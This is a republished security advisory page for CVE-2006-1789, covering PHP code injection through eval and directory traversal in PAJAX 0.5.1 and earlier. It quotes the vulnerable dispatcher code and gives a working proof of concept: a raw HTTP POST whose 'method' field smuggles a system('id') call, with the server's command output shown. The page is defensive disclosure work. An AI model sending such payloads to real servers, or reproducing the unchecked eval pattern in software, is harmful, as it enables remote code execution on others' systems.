Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2006-1789 to a friend New vulnerability? New tool? Tell us	CVE-2006-1789 PAJAX XSS and File Inclusion     Credit: The information has been provided by RedTeam Pentesting. The original article can be found at: http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2006-1789 Details Check for CVE-2006-1789 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * pajax version 0.5.1 and prior Immune Systems:  * pajax version 0.5.2 and above By using PAJAX it is possible to write web applications that utilize PHP classes running on a remote server to perform operations. PAJAX is able to create a remote JavaScript interface object and a stub on the server for some PHP class. The JavaScript interface communicates with the stub on the server, which invokes the called methods on the remote object. To invoke methods on an object PHP's eval function is used. /pajax/pajax_call_dispatcher.php contains the following code:  // Invoking the method with args  eval("\$ret = \$obj->$method(".$args.");"); The $method and $args parameters consist of unchecked POST variables, which may contain harmful PHP code. Additionally a file is included for each specified classname. The included file consists of predefined paths and the user supplied variable $className:   function loadClass($className) {      $paths = split(CLASS_PATH_DELIMITER, $this->classPath);      foreach ($paths as $path) {         $classPath = $path . "/" . $className . ".class.php";   [...] This variable is not validated and thus allows directory traversal attacks. Proof of Concept:  [s@host ~]$ nc www.example.com 80    POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7    Content-Type: text/json    Content-length: 137    Host: www.example.com    {"id": "bb2238f1186dad8d6370d2bab5f290f71", "className": "Calculator", "method": "add(1,1);system("id");$obj->add", "params": ["1", "5"]}    HTTP/1.1 200 OK    Date: Thu, 30 Mar 2006 14:21:08 GMT    Server: Apache    X-Powered-By: PHP/4.4.2    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0    Pragma: no-cache    Transfer-Encoding: chunked    Content-Type: text/html    27    uid=80(www) gid=80(www) groups=80(www)    [...] CVE Information: CVE-2006-1551 CVE-2006-1789 Disclosure Timeline: 2006-03-30 Discovery of the problem 2006-03-30 Notification of the author 2006-03-30 Initial response from the author 2006-04-12 A fixed version of PAJAX is available 2006-04-13 Public release 2006-04-14 Added 2nd CVE, changed history to ISO 8601  Comments on CVE-2006-1789:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®